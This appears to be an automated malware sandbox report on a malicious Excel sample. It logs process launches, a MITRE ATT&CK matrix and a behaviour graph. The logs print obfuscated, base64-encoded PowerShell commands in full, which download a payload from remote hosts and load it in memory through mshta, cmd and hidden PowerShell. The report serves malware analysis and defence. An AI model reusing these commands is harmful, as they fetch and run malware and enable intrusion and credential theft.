invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jhfidmrdtlazwcagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagyurelvrzugugicagicagicagicagicagicagicagicagicagicagic1nzw1izxjeruzjtkluaw9oicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidvjmtw9uiiwgicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagiezocepjs3asc3ryaw5nicagicagicagicagicagicagicagicagicagicagicb5r09zte1jlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagckfuylbolhvpbnqgicagicagicagicagicagicagicagicagicagicagifhuvmjyqyxjbnrqdhigicagicagicagicagicagicagicagicagicagicagigtoennhau9lktsnicagicagicagicagicagicagicagicagicagicagicatbmftrsagicagicagicagicagicagicagicagicagicagicagimpmymzusnjtsxvqiiagicagicagicagicagicagicagicagicagicagicaglw5bbwvzugfjzsagicagicagicagicagicagicagicagicagicagicagqxcgicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicrxynzkq05qm1g6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xnziumjq1ljeymy4yos8xmzqzl3nlzw1lymvzdhroaw5nc3dpdghlbnrpcmv0agluz3n3axroz3jlyxruyxr1cmv0agluz3mudelgiiwijgvuvjpbufbeqvrbxhnlzw1lymvzdhroaw5nc3dpdghlbnrpcmv0agluz3n3axroz3jlyxruyxr1cmv0agluzy52ylmildasmck7c1rhulqtu0xlzvaomyk7aukgicagicagicagicagicagicagicagicagicagicagicikrw52okfquerbvefcc2vlbwvizxn0dghpbmdzd2l0agvudglyzxroaw5nc3dpdghncmvhdg5hdhvyzxroaw5nlnziuyi='+[char]34+'))')))"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jhfidmrdtlazwcagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagyurelvrzugugicagicagicagicagicagicagicagicagicagicagic1nzw1izxjeruzjtkluaw9oicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidvjmtw9uiiwgicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagiezocepjs3asc3ryaw5nicagicagicagicagicagicagicagicagicagicagicb5r09zte1jlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagckfuylbolhvpbnqgicagicagicagicagicagicagicagicagicagicagifhuvmjyqyxjbnrqdhigicagicagicagicagicagicagicagicagicagicagigtoennhau9lktsnicagicagicagicagicagicagicagicagicagicagicatbmftrsagicagicagicagicagicagicagicagicagicagicagimpmymzusnjtsxvqiiagicagicagicagicagicagicagicagicagicagicaglw5bbwvzugfjzsagicagicagicagicagicagicagicagicagicagicagqxcgicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicrxynzkq05qm1g6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xnziumjq1ljeymy4yos8xmzqzl3nlzw1lymvzdhroaw5nc3dpdghlbnrpcmv0agluz3n3axroz3jlyxruyxr1cmv0agluz3mudelgiiwijgvuvjpbufbeqvrbxhnlzw1lymvzdhroaw5nc3dpdghlbnrpcmv0agluz3n3axroz3jlyxruyxr1cmv0agluzy52ylmildasmck7c1rhulqtu0xlzvaomyk7aukgicagicagicagicagicagicagicagicagicagicagicikrw52okfquerbvefcc2vlbwvizxn0dghpbmdzd2l0agvudglyzxroaw5nc3dpdghncmvhdg5hdhvyzxroaw5nlnziuyi='+[char]34+'))')))"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgnneftb2noyxzpbghhid0gc0lxahr0chm6ly8zmtankyc1lmzpbgvtywlslmnvbs9hcgkvzmlszs9nzxq/zmlszwtlet1zafrqsccrj2jdufg4bycrjy1st3rdcuhmrzzfmhgnkyddes14bdr0bnhsqvziutk1lwr2jysnavrlnwnbuicrj2fozffqymizbwv4zndrekttvfhnjnnraxbyzwc9dhj1zszwa192ascrj2q9ztaxjysnmdk2mzhjowjmyjk1nze3mzi1mzenkyczmdlinwzmn2mgc0lxozrbbxryawnoaxntbya9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xzwjdbgllbnq7neftbgluzm90b21pysa9iccrjzrbbxryawnoaxntby5eb3dubg9hzerhdgeoneftbycrj2noyxzpbghhkts0qw1wcmvzdw0nkydwdhunkydvc28gpsbbu3lzdgvtllrlehqurw5jb2rpbmddojpvvey4lkdldfn0cmluzyg0jysnqw1saw5mb3rvbscrj2lhkts0qw1uaxrpzhvsyxigpsbzsvc8pejbjysnu0u2nf9tvefsvd4+c0lxozrbbw9idm9sdmlkbya9ihnjvycrjzw8qkftrtynkyc0x0vord4+c0lxozrbbwxvz29ncmlmbya9idrbbxbyjysnzxn1bxb0dw9zby5jbmrlee9mkdrbbw5pdgknkydkdwxhcicrjyk7neftdg9saglkbya9idrbbxbyzxn1bxb0dw9zby5jbmrlee9mkdrbbw8nkydidm9sdmlkbyk7neftbg9nb2dyawzvic1nzsawic1hbmqgneftdg9saglkbyatz3qgneftbg9nb2dyawzvozrbbwxvz29ncmlmbyarpsa0qw1uaxrpzhvsyxiutgvuzycrj3roozrbbxzpbmrpdgegpsa0qw10b2xoawrvic0gneftbg9nb2dyawzvozrbbscrj2zpz2egpsa0qw1wcmvzdw1wdhvvc28uu3vic3ryaw5nkdrbbwxvz29ncmlmbywgneftdmluzgl0ysk7neftyw50awdhbwvudgugpsatam9pbiaoneftzmlnys5ubycrj0noyxjbcnjhjysnesgpifmnkydfmibgb3jfywnolu9iamunkydjdcb7idrbbv8gfslblteuli0oneftzmlnys5mzw5ndggpxts0qw1tyscrj3jtb3inkydpemfyjysnid0gwycrj1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzyg0qw1hbnrpz2ftzw50zsk7neftzgvzzw1tywrlaxjhcia9ifttexn0zw0uumvmbgvjdglvbi5bc3nlbwinkydsev06okxvywqoneftbwfybw9yaxphcik7neftcg9ljysndglmawnhcia9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qocycrj0lxvkfjcycrj0lxkts0qw0nkydwb2v0awzpy2fylkludm9rzsg0qw1udwxslcbakhnjv3r4dc5wr0zsrs8zndmxlzkyljmyms41ndiumjcxly86chr0ahnjvywgc0lxneftzgunkydzdw5pzmljyxjzsvcsihnjvzrbbwrlc3vuawzpy2fyc0lxlcbzsvc0qw1kzxn1bmlmawnhcnnjvywgc0lxyxnwbmv0x2nvbxbpbgvyc0lxlcbzsvc0jysnqw1kzxn1bmlmawnhcnnjvywgc0lxneftzgvzdw5pzmljyxjzsvcsc0lxneftzgvzdw5pzmljyscrj3jzsvcsc0lxneftzgvzdw5pzmljyxjzsvcsc0lxneftzgvzdw5pzmljyxjzsvcsc0lxneftzgvzdw5pzmljyxjzsvcsc0lxneftzgvzdw5pzmljyxjzsvcsc0lxmxnjvyxzsscrj1c0qw1kzxn1bmlmawnhcnnjvykpoycpic1jukvqbefjzsaow2noyvjdntirw2noyvjdnjurw2noyvjdmta5ksxby2hhul0zniaty1jfugxby2ugj3njvycsw2noyvjdmzkgic1jukvqbefjzshby2hhul04mytby2hhul02ostby2hhul01mcksw2noyvjdmti0ksb8icyoicrftny6q29tc3bfy1s0ldi0ldi1xs1kb2lojycp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('4amochavilha = siwhttps://310'+'5.filemail.com/api/file/get?filekey=shtph'+'bcpx8o'+'-lotcqhlg6_0x'+'cy-xl4tnxlavbq95-dv'+'itk5car'+'andqjbb3mexfwqzkmtxg&skipreg=true&pk_vi'+'d=e01'+'09638c9bfb9571732531'+'309b5ff7c siw;4amtrichismo = new-object system.net.webclient;4amlinfotomia = '+'4amtrichismo.downloaddata(4amo'+'chavilha);4ampresum'+'ptu'+'oso = [system.text.encoding]::utf8.getstring(4'+'amlinfotom'+'ia);4amnitidular = siw<<ba'+'se64_start>>siw;4amobvolvido = siw'+'<<base6'+'4_end>>siw;4amlogogrifo = 4ampr'+'esumptuoso.indexof(4amniti'+'dular'+');4amtolhido = 4ampresumptuoso.indexof(4amo'+'bvolvido);4amlogogrifo -ge 0 -and 4amtolhido -gt 4amlogogrifo;4amlogogrifo += 4amnitidular.leng'+'th;4amvindita = 4amtolhido - 4amlogogrifo;4am'+'figa = 4ampresumptuoso.substring(4amlogogrifo, 4amvindita);4amantigamente = -join (4amfiga.to'+'chararra'+'y() s'+'e2 foreach-obje'+'ct { 4am_ })[-1..-(4amfiga.length)];4amma'+'rmor'+'izar'+' = ['+'system.convert]::frombase64string(4amantigamente);4amdesemmadeirar = [system.reflection.assemb'+'ly]::load(4ammarmorizar);4ampoe'+'tificar = [dnlib.io.home].getmethod(s'+'iwvais'+'iw);4am'+'poetificar.invoke(4amnull, @(siwtxt.vgfre/3431/92.321.542.271//:ptthsiw, siw4amde'+'sunificarsiw, siw4amdesunificarsiw, siw4amdesunificarsiw, siwaspnet_compilersiw, siw4'+'amdesunificarsiw, siw4amdesunificarsiw,siw4amdesunifica'+'rsiw,siw4amdesunificarsiw,siw4amdesunificarsiw,siw4amdesunificarsiw,siw4amdesunificarsiw,siw1siw,si'+'w4amdesunificarsiw));') -creplace ([char]52+[char]65+[char]109),[char]36 -creplace 'siw',[char]39 -creplace([char]83+[char]69+[char]50),[char]124) | &( $env:comspec[4,24,25]-join'')"
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jhfidmrdtlazwcagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagyurelvrzugugicagicagicagicagicagicagicagicagicagicagic1nzw1izxjeruzjtkluaw9oicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidvjmtw9uiiwgicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagiezocepjs3asc3ryaw5nicagicagicagicagicagicagicagicagicagicagicb5r09zte1jlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagckfuylbolhvpbnqgicagicagicagicagicagicagicagicagicagicagifhuvmjyqyxjbnrqdhigicagicagicagicagicagicagicagicagicagicagigtoennhau9lktsnicagicagicagicagicagicagicagicagicagicagicatbmftrsagicagicagicagicagicagicagicagicagicagicagimpmymzusnjtsxvqiiagicagicagicagicagicagicagicagicagicagicaglw5bbwvzugfjzsagicagicagicagicagicagicagicagicagicagicagqxcgicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicrxynzkq05qm1g6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xnziumjq1ljeymy4yos8xmzqzl3nlzw1lymvzdhroaw5nc3dpdghlbnrpcmv0agluz3n3axroz3jlyxruyxr1cmv0agluz3mudelgiiwijgvuvjpbufbeqvrbxhnlzw1lymvzdhroaw5nc3dpdghlbnrpcmv0agluz3n3axroz3jlyxruyxr1cmv0agluzy52ylmildasmck7c1rhulqtu0xlzvaomyk7aukgicagicagicagicagicagicagicagicagicagicagicikrw52okfquerbvefcc2vlbwvizxn0dghpbmdzd2l0agvudglyzxroaw5nc3dpdghncmvhdg5hdhvyzxroaw5nlnziuyi='+[char]34+'))')))"Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jhfidmrdtlazwcagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagyurelvrzugugicagicagicagicagicagicagicagicagicagicagic1nzw1izxjeruzjtkluaw9oicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidvjmtw9uiiwgicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagiezocepjs3asc3ryaw5nicagicagicagicagicagicagicagicagicagicagicb5r09zte1jlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagckfuylbolhvpbnqgicagicagicagicagicagicagicagicagicagicagifhuvmjyqyxjbnrqdhigicagicagicagicagicagicagicagicagicagicagigtoennhau9lktsnicagicagicagicagicagicagicagicagicagicagicatbmftrsagicagicagicagicagicagicagicagicagicagicagimpmymzusnjtsxvqiiagicagicagicagicagicagicagicagicagicagicaglw5bbwvzugfjzsagicagicagicagicagicagicagicagicagicagicagqxcgicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicrxynzkq05qm1g6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xnziumjq1ljeymy4yos8xmzqzl3nlzw1lymvzdhroaw5nc3dpdghlbnrpcmv0agluz3n3axroz3jlyxruyxr1cmv0agluz3mudelgiiwijgvuvjpbufbeqvrbxhnlzw1lymvzdhroaw5nc3dpdghlbnrpcmv0agluz3n3axroz3jlyxruyxr1cmv0agluzy52ylmildasmck7c1rhulqtu0xlzvaomyk7aukgicagicagicagicagicagicagicagicagicagicagicikrw52okfquerbvefcc2vlbwvizxn0dghpbmdzd2l0agvudglyzxroaw5nc3dpdghncmvhdg5hdhvyzxroaw5nlnziuyi='+[char]34+'))')))"Jump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgnneftb2noyxzpbghhid0gc0lxahr0chm6ly8zmtankyc1lmzpbgvtywlslmnvbs9hcgkvzmlszs9nzxq/zmlszwtlet1zafrqsccrj2jdufg4bycrjy1st3rdcuhmrzzfmhgnkyddes14bdr0bnhsqvziutk1lwr2jysnavrlnwnbuicrj2fozffqymizbwv4zndrekttvfhnjnnraxbyzwc9dhj1zszwa192ascrj2q9ztaxjysnmdk2mzhjowjmyjk1nze3mzi1mzenkyczmdlinwzmn2mgc0lxozrbbxryawnoaxntbya9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xzwjdbgllbnq7neftbgluzm90b21pysa9iccrjzrbbxryawnoaxntby5eb3dubg9hzerhdgeoneftbycrj2noyxzpbghhkts0qw1wcmvzdw0nkydwdhunkydvc28gpsbbu3lzdgvtllrlehqurw5jb2rpbmddojpvvey4lkdldfn0cmluzyg0jysnqw1saw5mb3rvbscrj2lhkts0qw1uaxrpzhvsyxigpsbzsvc8pejbjysnu0u2nf9tvefsvd4+c0lxozrbbw9idm9sdmlkbya9ihnjvycrjzw8qkftrtynkyc0x0vord4+c0lxozrbbwxvz29ncmlmbya9idrbbxbyjysnzxn1bxb0dw9zby5jbmrlee9mkdrbbw5pdgknkydkdwxhcicrjyk7neftdg9saglkbya9idrbbxbyzxn1bxb0dw9zby5jbmrlee9mkdrbbw8nkydidm9sdmlkbyk7neftbg9nb2dyawzvic1nzsawic1hbmqgneftdg9saglkbyatz3qgneftbg9nb2dyawzvozrbbwxvz29ncmlmbyarpsa0qw1uaxrpzhvsyxiutgvuzycrj3roozrbbxzpbmrpdgegpsa0qw10b2xoawrvic0gneftbg9nb2dyawzvozrbbscrj2zpz2egpsa0qw1wcmvzdw1wdhvvc28uu3vic3ryaw5nkdrbbwxvz29ncmlmbywgneftdmluzgl0ysk7neftyw50awdhbwvudgugpsatam9pbiaoneftzmlnys5ubycrj0noyxjbcnjhjysnesgpifmnkydfmibgb3jfywnolu9iamunkydjdcb7idrbbv8gfslblteuli0oneftzmlnys5mzw5ndggpxts0qw1tyscrj3jtb3inkydpemfyjysnid0gwycrj1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzyg0qw1hbnrpz2ftzw50zsk7neftzgvzzw1tywrlaxjhcia9ifttexn0zw0uumvmbgvjdglvbi5bc3nlbwinkydsev06okxvywqoneftbwfybw9yaxphcik7neftcg9ljysndglmawnhcia9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qocycrj0lxvkfjcycrj0lxkts0qw0nkydwb2v0awzpy2fylkludm9rzsg0qw1udwxslcbakhnjv3r4dc5wr0zsrs8zndmxlzkyljmyms41ndiumjcxly86chr0ahnjvywgc0lxneftzgunkydzdw5pzmljyxjzsvcsihnjvzrbbwrlc3vuawzpy2fyc0lxlcbzsvc0qw1kzxn1bmlmawnhcnnjvywgc0lxyxnwbmv0x2nvbxbpbgvyc0lxlcbzsvc0jysnqw1kzxn1bmlmawnhcnnjvywgc0lxneftzgvzdw5pzmljyxjzsvcsc0lxneftzgvzdw5pzmljyscrj3jzsvcsc0lxneftzgvzdw5pzmljyxjzsvcsc0lxneftzgvzdw5pzmljyxjzsvcsc0lxneftzgvzdw5pzmljyxjzsvcsc0lxneftzgvzdw5pzmljyxjzsvcsc0lxmxnjvyxzsscrj1c0qw1kzxn1bmlmawnhcnnjvykpoycpic1jukvqbefjzsaow2noyvjdntirw2noyvjdnjurw2noyvjdmta5ksxby2hhul0zniaty1jfugxby2ugj3njvycsw2noyvjdmzkgic1jukvqbefjzshby2hhul04mytby2hhul02ostby2hhul01mcksw2noyvjdmti0ksb8icyoicrftny6q29tc3bfy1s0ldi0ldi1xs1kb2lojycp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('4amochavilha = siwhttps://310'+'5.filemail.com/api/file/get?filekey=shtph'+'bcpx8o'+'-lotcqhlg6_0x'+'cy-xl4tnxlavbq95-dv'+'itk5car'+'andqjbb3mexfwqzkmtxg&skipreg=true&pk_vi'+'d=e01'+'09638c9bfb9571732531'+'309b5ff7c siw;4amtrichismo = new-object system.net.webclient;4amlinfotomia = '+'4amtrichismo.downloaddata(4amo'+'chavilha);4ampresum'+'ptu'+'oso = [system.text.encoding]::utf8.getstring(4'+'amlinfotom'+'ia);4amnitidular = siw<<ba'+'se64_start>>siw;4amobvolvido = siw'+'<<base6'+'4_end>>siw;4amlogogrifo = 4ampr'+'esumptuoso.indexof(4amniti'+'dular'+');4amtolhido = 4ampresumptuoso.indexof(4amo'+'bvolvido);4amlogogrifo -ge 0 -and 4amtolhido -gt 4amlogogrifo;4amlogogrifo += 4amnitidular.leng'+'th;4amvindita = 4amtolhido - 4amlogogrifo;4am'+'figa = 4ampresumptuoso.substring(4amlogogrifo, 4amvindita);4amantigamente = -join (4amfiga.to'+'chararra'+'y() s'+'e2 foreach-obje'+'ct { 4am_ })[-1..-(4amfiga.length)];4amma'+'rmor'+'izar'+' = ['+'system.convert]::frombase64string(4amantigamente);4amdesemmadeirar = [system.reflection.assemb'+'ly]::load(4ammarmorizar);4ampoe'+'tificar = [dnlib.io.home].getmethod(s'+'iwvais'+'iw);4am'+'poetificar.invoke(4amnull, @(siwtxt.vgfre/3431/92.321.542.271//:ptthsiw, siw4amde'+'sunificarsiw, siw4amdesunificarsiw, siw4amdesunificarsiw, siwaspnet_compilersiw, siw4'+'amdesunificarsiw, siw4amdesunificarsiw,siw4amdesunifica'+'rsiw,siw4amdesunificarsiw,siw4amdesunificarsiw,siw4amdesunificarsiw,siw4amdesunificarsiw,siw1siw,si'+'w4amdesunificarsiw));') -creplace ([char]52+[char]65+[char]109),[char]36 -creplace 'siw',[char]39 -creplace([char]83+[char]69+[char]50),[char]124) | &( $env:comspec[4,24,25]-join'')"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information121
      Scripting      		Valid Accounts221
      Command and Scripting Interpreter      		121
      Scripting      		11
      Process Injection      		1
      Masquerading      		OS Credential Dumping1
      Process Discovery      		Remote Services1
      Email Collection      		11
      Encrypted Channel      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts23
      Exploitation for Client Execution      		1
      DLL Side-Loading      		1
      DLL Side-Loading      		21
      Virtualization/Sandbox Evasion      		LSASS Memory21
      Virtualization/Sandbox Evasion      		Remote Desktop Protocol1
      Archive Collected Data      		3
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts4
      PowerShell      		Logon Script (Windows)Logon Script (Windows)11
      Process Injection      		Security Account Manager1
      Application Window Discovery      		SMB/Windows Admin Shares1
      Clipboard Data      		2
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Deobfuscate/Decode Files or Information      		NTDS1
      Remote System Discovery      		Distributed Component Object ModelInput Capture13
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
      Obfuscated Files or Information      		LSA Secrets1
      File and Directory Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      Install Root Certificate      		Cached Domain Credentials14
      System Information Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
      DLL Side-Loading      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 signatures2 2 Behavior Graph ID: 1564317 Sample: Swiftcopy.xla.xlsx Startdate: 28/11/2024 Architecture: WINDOWS Score: 100 69 Suricata IDS alerts for network traffic 2->69 71 Malicious sample detected (through community Yara rule) 2->71 73 Multi AV Scanner detection for submitted file 2->73 75 17 other signatures 2->75 11 EXCEL.EXE 31 28 2->11         started        process3 dnsIp4 57 172.245.123.29, 49164, 49166, 49167 AS-COLOCROSSINGUS United States 11->57 59 ljg.cl 152.231.117.86, 443, 49163, 49165 ENTELCHILESACL Chile 11->59 45 C:\Users\user\Desktop\~$Swiftcopy.xla.xlsx, data 11->45 dropped 47 C:\Users\user\...\seemebestthings[1].hta, HTML 11->47 dropped 97 Microsoft Office drops suspicious files 11->97 16 mshta.exe 10 11->16         started        file5 signatures6 process7 dnsIp8 51 ljg.cl 16->51 61 Suspicious command line found 16->61 63 PowerShell case anomaly found 16->63 20 cmd.exe 16->20         started        signatures9 process10 signatures11 77 Suspicious powershell command line found 20->77 79 Wscript starts Powershell (via cmd or directly) 